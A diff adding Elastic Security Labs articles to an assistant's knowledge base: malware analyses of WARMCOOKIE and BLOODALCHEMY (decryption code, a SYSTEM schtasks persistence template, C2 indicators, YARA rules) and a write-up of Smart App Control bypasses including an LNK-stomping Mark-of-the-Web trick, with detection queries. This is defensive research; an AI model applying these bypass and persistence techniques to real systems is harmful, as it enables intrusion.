+        $seq_registry = { 48 81 EC 80 02 00 00 48 8B 05 F7 09 02 00 48 33 C4 48 89 84 24 70 02 00 00 4C 89 B4 24 98 02 00 00 48 8D 0D 4D CA 01 00 45 33 F6 41 8B FE E8 02 4F 00 00 48 8B E8 41 B9 08 01 00 00 48 8D 44 24 }
+        $plain_str1 = "release.dll" ascii fullword
+        $plain_str2 = "\"Main Invoked.\"" ascii fullword
+        $plain_str3 = "\"Main Returned.\"" ascii fullword
+        $decrypt_str1 = "ERROR: Cannot write file" wide fullword
+        $decrypt_str2 = "OK (No output data)" wide fullword
+        $decrypt_str3 = "OK (See 'Files' tab)" wide fullword
+        $decrypt_str4 = "cmd.exe /c %ls" wide fullword
+        $decrypt_str5 = "Cookie:" wide fullword
+        $decrypt_str6 = "%ls\\*.*" wide fullword
+    condition:
+        (3 of ($plain*)) or (2 of ($seq*)) or 4 of ($decrypt*)
+}
+```
+
+## Observations
+
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/warmcookie) in both ECS and STIX format.
+
+The following observables were discussed in this research.
+
+| Observable                                                       | Type      | Name       | Reference            |
+|------------------------------------------------------------------|-----------|------------|----------------------|
+| `ccde1ded028948f5cd3277d2d4af6b22fa33f53abde84ea2aa01f1872fad1d13` | SHA-256   | RtlUpd.dll | WARMCOOKIE           |
+| `omeindia[.]com`                                                   | domain    |            | Phishing link        |
+| `assets.work-for[.]top`                                            | domain    |            | Landing page         |
+| `45.9.74[.]135`                                                    | ipv4-addr |            | Landing page         |
+| `80.66.88[.]146`                                                   | ipv4-addr |            | WARMCOOKIE C2 server |
+| `185.49.69[.]41`                                                   | ipv4-addr |            | WARMCOOKIE C2 server |
+
+## References
+
+The following were referenced throughout the above research:
+
+* [https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign](https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign)
+* [https://x.com/Cryptolaemus1/status/1785423804577034362](https://x.com/Cryptolaemus1/status/1785423804577034362)
+
+## Appendix
+
+**Checksum example**
+
+```python
+def calculate_checksum(str_input, str_len, i):
+    if i == 0:
+        i = 0xFFFFFFFF
+    if i == -1:
+        i = 0
+
+    for idx in range(0, str_len, 2):
+        v6 = str_input[idx] | (str_input[idx + 1] << 8)
+        for _ in range(16):
+            if (v6 ^ i) & 1:
+                i = ((i >> 1) ^ 0xEDB88320) & 0xFFFFFFFF
+            else:
+                i = (i >> 1) & 0xFFFFFFFF
+            v6 >>= 1
+
+    return ~i & 0xFFFFFFFF
+
+
+serial_volume = 0x0A2C9AD2F
+
+mutex = "f92e6f3c-9cc3-4be0-966c-1be421e69140".encode("utf-16le")
+mutex_result = calculate_checksum(mutex, len(mutex), -1)
+
+username = "REM\x00".encode("utf-16le")
+username_result = calculate_checksum(username, len(username), -1)
+
+computer_name = "DESKTOP-2C3IQHO".encode("utf-16le")
+computer_name_result = calculate_checksum(computer_name, len(computer_name), -1)
+
+print(f"Mutex: {hex(mutex_result)}")
+print(f"Username: {hex(username_result)}")
+print(f"Computer Name: {hex(computer_name_result)}")
+print(f"#1 Checksum: {hex(serial_volume ^ mutex_result)}")
+print(f"#2 Checksum: {hex(username_result ^ computer_name_result)}")
+```
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/disclosing_the_bloodalchemy_backdoor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/disclosing_the_bloodalchemy_backdoor.md
new file mode 100644
index 0000000000000..d08ffa53fa588
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/disclosing_the_bloodalchemy_backdoor.md
@@ -0,0 +1,402 @@
+---
+title: "Disclosing the BLOODALCHEMY backdoor"
+slug: "disclosing-the-bloodalchemy-backdoor"
+date: "2023-10-13"
+description: "BLOODALCHEMY is a new, actively developed, backdoor that leverages a benign binary as an injection vehicle, and is a part of the REF5961 intrusion set."
+author:
+  - slug: cyril-francois
+image: "photo-edited-05@2x.jpg"
+category:
+  - slug: security-research
+  - slug: malware-analysis
+tags:
+  - security-research
+  - malware-analysis
+  - ref5961
+  - bloodalchemy
+---
+
+## Preamble
+
+BLOODALCHEMY is an x86 backdoor written in C and found as shellcode injected into a signed benign process. It was discovered in our analysis and is part of the REF5961 intrusion set, which you can read about [here](https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set). 
+
+BLOODALCHEMY requires a specific loader to be run because it isn't reflexive (it doesn’t have the capability to load and execute by itself). Additionally, BLOODALCHEMY isn’t compiled as position independent (when loaded at a different base address than the preferred one the binary has to be patched to take into account the new “position”). 
+
+In our analysis, the signed benign process was previously sideloaded with a malicious DLL. The DLL was missing from the sample data but was likely the container and the loader of the BLOODALCHEMY shellcode.
+
+We believe from our research that the malware is part of a bigger toolset and is still in active development based on its current lack of capabilities, enabled debug logging of exceptions, and the existence of test strings used for persistence service setup.
+
+## Key takeaways
+* BLOODALCHEMY is likely a new backdoor and is still in active development
+* BLOODALCHEMY abuses a legitimate binary for loading
+* BLOODALCHEMY has multiple running modes, persistence mechanisms, and communication options
+
+## Initial execution
+
+During the initial execution phase, the adversary deployed a benign utility, `BrDifxapi.exe`, which is vulnerable to DLL side-loading. When deploying this vulnerable utility the adversary could side-load the unsigned BLOODALCHEMY loader (`BrLogAPI.dll`) and inject shellcode into the current process.
+
+![Command-line used to execute the BLOODALCHEMY loader](/assets/images/disclosing-the-bloodalchemy-backdoor/image4.png)
+
+
+![Fake BrLogApi.dll, part of BLOODALCHEMY toolset, sideloaded by BrDifxapi.exe](/assets/images/disclosing-the-bloodalchemy-backdoor/image15.png)
+
+
+`BrDifxapi.exe` is a binary developed by the Japanese company [Brother Industries](https://global.brother/en/gateway) and the version we observed has a revoked signature.
+
+![BrDifxapi.exe with revoked signature](/assets/images/disclosing-the-bloodalchemy-backdoor/image6.png)
+
+
+The legitimate DLL named `BrLogApi.dll` is an unsigned DLL also by Brother Industries. BLOODALCHEMY uses the same DLL name.
+
+![The legitimate BrLogApi.dll is an unsigned DLL file](/assets/images/disclosing-the-bloodalchemy-backdoor/image25.jpg)
+
+
+## Code analysis
+
+### Data Obfuscation
+
+To hide its strings the BLOODALCHEMY malware uses a classic technique where each string is encrypted, preceded by a single-byte decryption key, and finally, all concatenated together to form what we call an encrypted blob.
+
+While the strings are not null-terminated, the offset from the beginning of the blob, the string, and the size are passed as a parameter to the decryption function. Here is the encrypted blob format:
+
+_Blob = Key0 :EncryptedString0 + Key1:EncryptedString1 + ... + KeyN:EncryptedStringN_
+
+The implementation in Python of the string decryption algorithm is given below: 
+
+```Python
+def decrypt_bytes(encrypted_data: bytes, offset: int, size: int) -> bytes:
+    decrypted_size = size - 1
+    decrypted_data = bytearray(decrypted_size)
+
+    encrypted_data_ = encrypted_data[offset : offset + size]
+    key = encrypted_data_[0]
+
+    i = 0
+    while i != decrypted_size:
+            decrypted_data[i] = key ^ encrypted_data_[i + 1]
+           key = (key + ((key << ((i % 5) + 1)) | (key >> (7 - (i % 5))))) & 0xFF
+           i += 1
+
+    return bytes(decrypted_data)
+```
+
+The strings contained in the configuration blob are encrypted using the same scheme, however the ids (or offsets) of each string are obfuscated; it adds two additional layers of obfuscation that must be resolved. Below, we can resolve additional obfuscation layers to decrypt strings from the configuration:
+
+```Python
+def decrypt_configuration_string(id: int) -> bytes:
+        return decrypt_bytes(
+                *get_configuration_encrypted_string(
+                        get_configuration_dword(id)))
+```
+
+Each function is given below:
+
+**The `get_configuration_dword` function**
+```Python
+def get_configuration_dword(id: int) -> int:
+        b = ida_bytes.get_bytes(CONFIGURATION_VA + id, 4)
+        return b[0] + (b[1] + (b[2] + (b[3] << 8) << 8) << 8)
+```
+
+**The `get_configuration_encrypted_strng` function**
+```Python
+def get_configuration_encrypted_string(id: int) -> tuple[int, int]:
+         ea = CONFIGURATION_VA + id
+
+        v2 = 0
+        i = 0
+
+        while i <= 63:
+            c = ida_bytes.get_byte(ea)
+
+            v6 = (c & 127) << i
+            v2 = (v2 | v6) & 0xFFFFFFFF
+
+            ea += 1
+
+            if c >= 0:
+                break
+            
+            i += 7
+            return ea, v2
+```
+
+### Persistence
+
+BLOODALCHEMY maintains persistence by copying itself into its persistence folder with the path suffix `\Test\test.exe`, 
+
+![BLOODALCHEMY folder and binary name](/assets/images/disclosing-the-bloodalchemy-backdoor/image24.png)
+
+
+The root directory of the persistence folder is chosen based on its current privilege level, it can be either:
+* `%ProgramFiles%`
+* `%ProgramFiles(x86)%`
+* `%Appdata%`
+* `%LocalAppData%\Programs`
+
+![BLOODALCHEMY root persistence folder choice](/assets/images/disclosing-the-bloodalchemy-backdoor/image10.png)
+
+
+Persistence is achieved via different methods depending on the configuration:
+* As a service
+* As a registry key
+* As a scheduled task
+* Using [COM](https://learn.microsoft.com/en-us/windows/win32/learnwin32/what-is-a-com-interface-) interfaces
+
+To identify the persistence mechanisms, we can use the uninstall command to observe the different ways that the malware removes persistence.
+
+As a service named `Test`.
+
+![BLOODALCHEMY deleting previously installed service](/assets/images/disclosing-the-bloodalchemy-backdoor/image11.png)
+
+
+As a registry key at `CurrentVersion\Run`
+
+![BLOODALCHEMY deleting “CurrentVersion\Run” persistence registry key](/assets/images/disclosing-the-bloodalchemy-backdoor/image13.png)
+
+
+As a scheduled task, running with SYSTEM privilege via `schtask.exe`:
+```
+b'schtasks.exe /CREATE /SC %s /TN "%s" /TR "\'%s\'" /RU "NT AUTHORITY\\SYSTEM" /Fb'
+```
+
+Using the `TaskScheduler::ITaskService` COM interface. The intent of this persistence mechanism is currently unknown.
+
+![Instantiation of the ITaskService COM interface](/assets/images/disclosing-the-bloodalchemy-backdoor/image29.png)
+
+
+### Running modes
+
+The malware has different running modes depending on its configuration:
+* Within the main or separate process thread
+* Create a Windows process and inject a shellcode into it
+* As a service
+
+The malware can either work within the main process thread.
+
+![Capability function called within the main function](/assets/images/disclosing-the-bloodalchemy-backdoor/image5.png)
+
+
+Or run in a separate thread.
+
+![Capability function called in a new thread](/assets/images/disclosing-the-bloodalchemy-backdoor/image12.png)
+
+
+Or create a Windows process from a hardcoded list and inject a shellcode passed by parameter to the entry point using the [WriteProcessMemory+QueueUserAPC+ResumeThread](https://sevrosecurity.com/2020/04/13/process-injection-part-2-queueuserapc/) method.
+
+![Process injection running method](/assets/images/disclosing-the-bloodalchemy-backdoor/image3.png)
+
+
+![List of target binaries for process injection](/assets/images/disclosing-the-bloodalchemy-backdoor/image21.png)
+
+
+The shellcode is contained in the parameters we call `p_interesting_data`. This parameter is actually a pointer to a structure containing both the malware configuration and executable binary data.
+
+![Entrypoint prototype](/assets/images/disclosing-the-bloodalchemy-backdoor/image18.png)
+
+
+![Provided shellcode copied in the remote process](/assets/images/disclosing-the-bloodalchemy-backdoor/image23.png)
+
+
+![Final part of the process injection procedure](/assets/images/disclosing-the-bloodalchemy-backdoor/image20.png)
+
+
+Or install and run itself as a service. In this scenario, the service name and description will be `Test` and `Digital Imaging System`:
+
+![Name and description strings used to install the BLOODALCHEMY service](/assets/images/disclosing-the-bloodalchemy-backdoor/image26.png)
+
+
+Also when running as a service and started by the service manager the malware will masquerade itself as stopped by first setting the service status to “SERVICE_RUNNING” then setting the status to “SERVICE_STOPPED” while in fact the malware is still running.
+
+![BLOODALCHEMY’s service entry point masquerading service status](/assets/images/disclosing-the-bloodalchemy-backdoor/image30.png)
+
+
+### Communication
+
+The malware communicates using either the HTTP protocol, named pipes, or sockets.
+
+When using the HTTP protocol the malware requests the following URI `/Inform/logger/.`
+
+![URI used to connect to C2](/assets/images/disclosing-the-bloodalchemy-backdoor/image27.png)
+
+
+In this scenario, BLOODALCHEMY will try to use any proxy server found in the registry key `SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings`.
+
+![Host proxy information gathered from registry](/assets/images/disclosing-the-bloodalchemy-backdoor/image28.png)
+
+
+We did not uncover any C2 infrastructure with our sample, but the URL could look something like this: `https://malwa[.]re/Inform/logger`
+
+When using a named pipe, the name is randomly generated using the current PID as seed.
+
+![Random pipe name generation seeded with current PID](/assets/images/disclosing-the-bloodalchemy-backdoor/image9.png)
+
+
+While waiting for a client to connect to this named pipe the malware scans the running processes and checks that its parent process is still running, this may be to limit access to the named pipe. That said, the malware is not checking that the pipe client is the correct parent process, only that the parent process is running. This introduces flawed logic in protecting the named pipe.
+
+![Retrieve parent PID](/assets/images/disclosing-the-bloodalchemy-backdoor/image16.png)
+
+
+![Flawed check for restricting pipe access to parent process](/assets/images/disclosing-the-bloodalchemy-backdoor/image7.png)
+
+
+From the malware strings and imports we know that the malware can also operate using TCP/UDP sockets.
+
+![Usage of the socket API in one of the implementations of the “communication” interface](/assets/images/disclosing-the-bloodalchemy-backdoor/image17.png)
+
+
+While we haven’t made any conclusions about their usage, we list all the protocols found in the encrypted strings.
+* DNS://
+* HTTP://
+* HTTPS://
+* MUX://
+* UDP://
+* SMB://
+* SOCKS5://
+* SOCKS4://
+* TCP://
+
+For all protocols the data can be encrypted, [LZNT1 compressed](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-xca/94164d22-2928-4417-876e-d193766c4db6), and/or Base64-encoded.
+
+### Commands
+
+The malware only contains a few commands with actual effects:
+* Write/overwrite the malware toolset 
+* Launch its malware binary `Test.exe`
+* Uninstall and terminate
+* Gather host information
+
+There are three commands that write (or overwrite) the malware tool set with the received Base64-encoded binary data:
+* Either the malware binary (`Test.exe`)
+* the sideloaded DLL (`BrLogAPI.dll`)
+* or the main trusted binary (`BrDifxapi.exe`)
+
+![BLOODALCHEMY tool set overwrite commands](/assets/images/disclosing-the-bloodalchemy-backdoor/image8.png)
+
+
+One command that launches the `Test.exe` binary in the persistence folder.
+
+![BLOODALCHEMY command to run the malware executable binary](/assets/images/disclosing-the-bloodalchemy-backdoor/image19.png)
+
+
+The uninstall and terminate itself command will first delete all its files at specific locations then remove any persistence registry key or scheduled task, then remove installed service and finish by terminating itself.
+
+![Command to uninstall and terminate itself](/assets/images/disclosing-the-bloodalchemy-backdoor/image14.png)
+
+
+![Uninstall function](/assets/images/disclosing-the-bloodalchemy-backdoor/image2.png)
+
+
+One host information gathering command: CPU, OS, display, network, etc.
+
+![Information gathering command](/assets/images/disclosing-the-bloodalchemy-backdoor/image22.png)
+
+
+## Summary
+
+BLOODALCHEMY is a backdoor shellcode containing only original code(no statically linked libraries). This code appears to be crafted by experienced malware developers.
+
+The backdoor contains modular capabilities based on its configuration. These capabilities include multiple persistence, C2, and execution mechanisms.
+
+While unconfirmed, the presence of so few effective commands indicates that the malware may be a subfeature of a larger intrusion set or malware package, still in development, or an extremely focused piece of malware for a specific tactical usage.
+
+## BLOODALCHEMY and MITRE ATT&CK
+
+Elastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats used against enterprise networks.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+* [Command and Control](https://attack.mitre.org/tactics/TA0011/)
+* [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)
+* [Discovery](https://attack.mitre.org/tactics/TA0007/)
+* [Execution](https://attack.mitre.org/tactics/TA0002/)
+* [Process Injection](https://attack.mitre.org/techniques/T1055/)
+
+## Malware prevention capabilities
+
+* [BLOODALCHEMY](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_BloodAlchemy.yar)
+
+## YARA
+
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the BLOODALCHEMY malware:
+
+```yara
+BLOODALCHEMY
+rule Windows_Trojan_BloodAlchemy_1 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-09"
+        last_modified = "2023-06-13"
+        threat_name = "Windows.Trojan.BloodAlchemy"
+        license = "Elastic License v2"
+        os = "windows"
+
+    strings:
+        $a1 = { 55 8B EC 51 83 65 FC 00 53 56 57 BF 00 20 00 00 57 6A 40 FF 15 }
+        $a2 = { 55 8B EC 81 EC 80 00 00 00 53 56 57 33 FF 8D 45 80 6A 64 57 50 89 7D E4 89 7D EC 89 7D F0 89 7D }
+
+    condition:
+        all of them
+}
+
+rule Windows_Trojan_BloodAlchemy_2 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-09"
+        last_modified = "2023-06-13"
+        threat_name = "Windows.Trojan.BloodAlchemy"
+        license = "Elastic License v2"
+        os = "windows"
+
+    strings:
+        $a1 = { 55 8B EC 83 EC 54 53 8B 5D 08 56 57 33 FF 89 55 F4 89 4D F0 BE 00 00 00 02 89 7D F8 89 7D FC 85 DB }
+        $a2 = { 55 8B EC 83 EC 0C 56 57 33 C0 8D 7D F4 AB 8D 4D F4 AB AB E8 42 10 00 00 8B 7D F4 33 F6 85 FF 74 03 8B 77 08 }
+
+    condition:
+        any of them
+}
+
+rule Windows_Trojan_BloodAlchemy_3 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-10"
+        last_modified = "2023-06-13"
+        threat_name = "Windows.Trojan.BloodAlchemy"
+        license = "Elastic License v2"
+        os = "windows"
+
+    strings:
+        $a = { 55 8B EC 83 EC 38 53 56 57 8B 75 08 8D 7D F0 33 C0 33 DB AB 89 5D C8 89 5D D0 89 5D D4 AB 89 5D }
+
+    condition:
+        all of them
+}
+
+rule Windows_Trojan_BloodAlchemy_4 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-10"
+        last_modified = "2023-06-13"
+        threat_name = "Windows.Trojan.BloodAlchemy"
+        license = "Elastic License v2"
+        os = "windows"
+
+    strings:
+        $a = { 55 8B EC 83 EC 30 53 56 57 33 C0 8D 7D F0 AB 33 DB 68 02 80 00 00 6A 40 89 5D FC AB AB FF 15 28 }
+
+    condition:
+        all of them
+}
+```
+
+## Observations
+
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ref5961) in both ECS and STIX format in a combined zip bundle.
+
+The following observables were discussed in this research.
+
+| Observable                                                       | Type    | Name         | Reference           |
+|------------------------------------------------------------------|---------|--------------|---------------------|
+| `e14ee3e2ce0010110c409f119d56f6151fdca64e20d902412db46406ed89009a` | SHA-256 | `BrLogAPI.dll` | BLOODALCHEMY loader |
+| `25268bc07b64d0d1df441eb6f4b40dc44a6af568be0657533088d3bfd2a05455` | SHA-256 | NA | BLOODALCHEMY payload |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dismantling_smart_app_control.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dismantling_smart_app_control.md
new file mode 100644
index 0000000000000..185ba011969b5
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dismantling_smart_app_control.md
@@ -0,0 +1,153 @@
+---
+title: "Dismantling Smart App Control"
+slug: "dismantling-smart-app-control"
+date: "2024-08-06"
+subtitle: "New Initial Access and Evasion Techniques"
+description: "This article will explore Windows Smart App Control and SmartScreen as a case study for researching bypasses to reputation-based systems, then demonstrate detections to cover those weaknesses."
+author:
+  - slug: joe-desimone
+image: "Security Labs Images 19.jpg"
+category:
+  - slug: security-research
+---
+
+## Introduction
+
+Reputation-based protections like Elastic’s [reputation service](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html#behavior-protection) can significantly improve detection capabilities while maintaining low false positive rates. However, like any protection capability, weaknesses exist and bypasses are possible. Understanding these weaknesses allows defenders to focus their detection engineering on key coverage gaps. This article will explore Windows [Smart App Control](https://support.microsoft.com/en-us/topic/what-is-smart-app-control-285ea03d-fa88-4d56-882e-6698afdb7003) and SmartScreen as a case study for researching bypasses to reputation-based systems, then demonstrate detections to cover those weaknesses.
+
+### Key Takeaways:
+
+* Windows Smart App Control and SmartScreen have several design weaknesses that allow attackers to gain initial access with no security warnings or popups.
+* A bug in the handling of LNK files can also bypass these security controls
+* Defenders should understand the limitations of these OS features and implement detections in their security stack to compensate
+
+## SmartScreen/SAC Background
+
+Microsoft [SmartScreen](https://learn.microsoft.com/en-us/windows/security/operating-system-security/virus-and-threat-protection/microsoft-defender-smartscreen/) has been a built-in OS feature since Windows 8. It operates on files that have the [“Mark of the Web”](https://learn.microsoft.com/en-us/microsoft-365-apps/security/internet-macros-blocked#mark-of-the-web-and-zones) (MotW) and are clicked on by users. Microsoft introduced Smart App Control (SAC) with the release of Windows 11. SAC is, in some ways, an evolution of SmartScreen. Microsoft [says](https://support.microsoft.com/en-us/topic/what-is-smart-app-control-285ea03d-fa88-4d56-882e-6698afdb7003) it “adds significant protection from new and emerging threats by blocking apps that are malicious or untrusted.” It works by querying a Microsoft cloud service when applications are executed. If they are known to be safe, they are allowed to execute; however, if they are unknown, they will only be executed if they have a valid code signing signature. When SAC is enabled, it replaces and disables Defender SmartScreen. 
+
+Microsoft exposes undocumented APIs for querying the trust level of files for SmartScreen and Smart App Control. To help with this research, we developed a utility that will display the trust of a file. The source code for this utility is available [here](https://github.com/joe-desimone/rep-research/blob/ea8c70d488a03b5f931efa37302128d9e7a33ac0/rep-check/rep-check.cpp).
+
+## Signed Malware
+
+One way to bypass Smart App Control is to simply sign malware with a code-signing certificate. Even before SAC, there has been a trend towards attackers signing their malware to evade detection. More recently, attackers have routinely obtained Extend Validation (EV) signing certificates. EV certs require proof of identity to gain access and can only exist on specially designed hardware tokens, making them difficult to steal. However, attackers have found ways to impersonate businesses and purchase these certificates. The threat group behind [SolarMarker](https://www.elastic.co/security-labs/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant) has leveraged [over 100](https://squiblydoo.blog/2024/05/13/impostor-certs/) unique signing certificates across their campaigns. Certificate Authorities (CAs) should do more to crack down on abuse and minimize fraudulently-acquired certificates. More public research may be necessary to apply pressure on the CAs who are most often selling fraudulent certificates.
+
+## Reputation Hijacking
+
+Reputation hijacking is a generic attack paradigm on reputation-based malware protection systems. It is analogous to the [misplaced trust](https://web.archive.org/web/20171028135605/https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/MattGraeber.CaseySmith.pdf) research by Casey Smith and others against application control systems, as well as the [vulnerable driver research](https://i.blackhat.com/us-18/Thu-August-9/us-18-Desimone-Kernel-Mode-Threats-and-Practical-Defenses.pdf) from Gabriel Landau and I. Unfortunately, the attack surface in this case is even larger. Reputation hijacking involves finding and repurposing apps with a good reputation to bypass the system. To work as an initial access vector, one constraint is that the application must be controlled without any command line parameters—for example, a script host that loads and executes a script at a predictable file path. 
+
+Script hosts are an ideal target for a reputation hijacking attack. This is especially true if they include a foreign function interface (FFI) capability. With FFI, attackers can easily load and execute arbitrary code and malware in memory. Through searches in VirusTotal and GitHub, we identified many script hosts that have a known good reputation and can be co-opted for full code execution. This includes Lua, Node.js, and AutoHotkey interpreters. A sample to demonstrate this technique is available [here](https://github.com/joe-desimone/rep-research/blob/ea8c70d488a03b5f931efa37302128d9e7a33ac0/rep-hijacking/poc-rep-hijack-jam.zip).
+
+The following video demonstrates hijacking with the [JamPlus](https://github.com/jamplus/jamplus) build utility to bypass Smart App Control with no security warnings:
+
+![](/assets/images/dismantling-smart-app-control/rep_hijacking-jamasync.gif)
+
+In another example, SmartScreen security warnings were bypassed by using a known AutoHotkey interpreter:
+
+![](/assets/images/dismantling-smart-app-control/smartscreen-bypass-ahk-calc.gif)
+
+Another avenue to hijack the reputation of a known application is to exploit it. This could be simple, like a classic buffer overflow from reading an INI file in a predictable path. It could be something more complex that chains off other primitives (like command execution/registry write/etc). Also, multiple known apps can be chained together to achieve full code execution. For example, one application that reads a configuration file and executes a command line parameter can then be used to launch another known application that requires a set of parameters to gain arbitrary code execution.
+
+## Reputation Seeding
+
+Another attack on reputation protections is to seed attacker-controlled binaries into the system. If crafted carefully, these binaries can appear benign and achieve a good reputation while still being useful to attackers later. It could simply be a new script host binary, an application with a known vulnerability, or an application that has a useful primitive. On the other hand, it could be a binary that contains embedded malicious code but only activates after a certain date or environmental trigger.
+
+Smart App Control appears vulnerable to seeding. After executing a sample on one machine, it received a good label after approximately 2 hours. We noted that basic anti-emulation techniques seemed to be a factor in receiving a benign verdict or reputation. Fortunately, SmartScreen appears to have a higher global prevalence bar before trusting an application. A sample that demonstrates this technique is available [here](https://github.com/joe-desimone/rep-research/blob/ea8c70d488a03b5f931efa37302128d9e7a33ac0/rep-seeding/poc-rep-seeding.zip) and is demonstrated below:
+
+![](/assets/images/dismantling-smart-app-control/rephijack-primitive-seeding.gif)
+
+## Reputation Tampering
+
+A third attack class against reputation systems is reputation tampering. Normally, reputation systems use cryptographically secure hashing systems to make tampering infeasible. However, we noticed that certain modifications to a file did not seem to change the reputation for SAC. SAC may use fuzzy hashing or feature-based similarity comparisons in lieu of or in addition to standard file hashing. It may also leverage an ML model in the cloud to allow files that have a highly benign score (such as being very similar to known good). Surprisingly, some code sections could be modified without losing their associated reputation. Through trial and error, we could identify segments that could be safely tampered with and keep the same reputation. We crafted one [tampered binary](https://github.com/joe-desimone/rep-research/blob/ea8c70d488a03b5f931efa37302128d9e7a33ac0/rep-tampering/poc-rep-tampering.zip) with a unique hash that had never been seen by Microsoft or SAC. This embedded an “execute calc” shellcode and could be executed with SAC in enforcement mode:
+
+![](/assets/images/dismantling-smart-app-control/reptamperingpopcalc.gif)
+
+## LNK Stomping
+
+When a user downloads a file, the browser will create an associated “Zone.Identifier” file in an [alternate data stream](https://www.digital-detective.net/forensic-analysis-of-zone-identifier-stream/) known as the Mark of the Web (MotW). This lets other software (including AV and EDR) on the system know that the file is more risky. SmartScreen only scans files with the Mark of the Web. SAC completely blocks certain file types if they have it. This makes MotW bypasses an interesting research target, as it can usually lead to bypassing these security systems. Financially motivated threat groups have discovered and leveraged [multiple vulnerabilities](https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/) to bypass MotW checks. These techniques involved appending crafted and invalid code signing signatures to javascript or MSI files. 
+
+During our research, we stumbled upon another MotW bypass that is trivial to exploit. It involves crafting LNK files that have non-standard target paths or internal structures. When clicked, these LNK files are modified by explorer.exe with the canonical formatting. This modification leads to removal of the MotW label before security checks are performed. The function that overwrites the LNK files is **_SaveAsLink()** as shown in the following call stack:
+
+![](/assets/images/dismantling-smart-app-control/image3.png)
+
+The function that performs the security check is **CheckSmartScreen()** as shown in the following call stack:
+
+![](/assets/images/dismantling-smart-app-control/image1.png)
+
+The easiest demonstration of this issue is to append a dot or space to the target executable path (e.g., ```powershell.exe.```). Alternatively, one can create an LNK file that contains a relative path such as ```.\target.exe```. After clicking the link, ```explorer.exe``` will search for and find the matching ```.exe``` name, automatically correct the full path, update the file on disk (removing MotW), and finally launch the target. Yet another variant involves crafting a multi-level path in a single entry of the LNK’s target path array. The target path array should normally have 1 entry per directory. The [pylnk3](https://pypi.org/project/pylnk3/) utility shows the structure of an exploit LNK (non-canonical format) before and after execution (canonical format):
+
+![](/assets/images/dismantling-smart-app-control/image4.png)
+
+![](/assets/images/dismantling-smart-app-control/image2.png)
+
+A Python script that demonstrates these techniques is available [here](https://github.com/joe-desimone/rep-research/blob/8e22c587e727ce2e3ea1ccab973941b7dd2244fc/lnk_stomping/lnk_stomping.py). 
+
+The following shows an LNK file bypassing MotW restrictions under Smart App Control to launch Powershell and pop calc:
+
+![](/assets/images/dismantling-smart-app-control/sac-lnk-powershell.gif)
+
+In another example, we show this technique chained with the Microsoft cdb command line debugger to achieve arbitrary code execution and execute shellcode to pop calc:
+
+![](/assets/images/dismantling-smart-app-control/sac-lnk-cdb.gif)
+
+We identified multiple samples in VirusTotal that exhibit the bug, demonstrating existing in the wild usage. The oldest [sample](https://www.virustotal.com/gui/file/11dadc71018027c7e005a70c306532e5ea7abdc389964cbc85cf3b79f97f6b44/detection) identified was submitted over 6 years ago. We also disclosed details of the bug to the MSRC. It may be fixed in a future Windows update. We are releasing this information, along with detection logic and countermeasures, to help defenders identify this activity until a patch is available.
+## Detections
+
+Reputation hijacking, by its nature, can be difficult to detect. Countless applications can be co-opted to carry out the technique. Cataloging and blocking applications known to be abused is an initial (and continual) step. 
+
+```
+process where process.parent.name == "explorer.exe" and process.hash.sha256 in (
+"ba35b8b4346b79b8bb4f97360025cb6befaf501b03149a3b5fef8f07bdf265c7", // AutoHotKey
+"4e213bd0a127f1bb24c4c0d971c2727097b04eed9c6e62a57110d168ccc3ba10" // JamPlus
+)
+```
+
+However, this approach will always lag behind attackers. A slightly more robust approach is to develop behavioral signatures to identify general categories of abused software. For example, we can look for common Lua or Node.js function names or modules in suspicious call stacks: 
+
+```
+sequence by process.entity_id with maxspan=1m
+[library where
+  (dll.Ext.relative_file_creation_time <= 3600 or
+   dll.Ext.relative_file_name_modify_time <= 3600 or
+   (dll.Ext.device.product_id : ("Virtual DVD-ROM", "Virtual Disk","USB *") and not dll.path : "C:\\*")) and
+   _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info: "*!luaopen_*")] by dll.hash.sha256
+[api where
+ process.Ext.api.behaviors : ("shellcode", "allocate_shellcode", "execute_shellcode", "unbacked_rwx", "rwx", "hook_api") and
+ process.thread.Ext.call_stack_final_user_module.hash.sha256 : "?*"] by process.thread.Ext.call_stack_final_user_module.hash.sha256
+```
+
+```
+api where process.Ext.api.name : ("VirtualProtect*", "WriteProcessMemory", "VirtualAlloc*", "MapViewOfFile*") and
+ process.Ext.api.behaviors : ("shellcode", "allocate_shellcode", "execute_shellcode", "unbacked_rwx", "rwx", "hook_api") and
+ process.thread.Ext.call_stack_final_user_module.name : "ffi_bindings.node"
+```
+
+Security teams should pay particular attention to downloaded files. They can use local reputation to identify outliers in their environment for closer inspection. 
+
+```
+from logs-* | 
+where host.os.type == "windows"
+and event.category == "process" and event.action == "start"
+and process.parent.name == "explorer.exe"
+and (process.executable like "*Downloads*" or process.executable like "*Temp*")
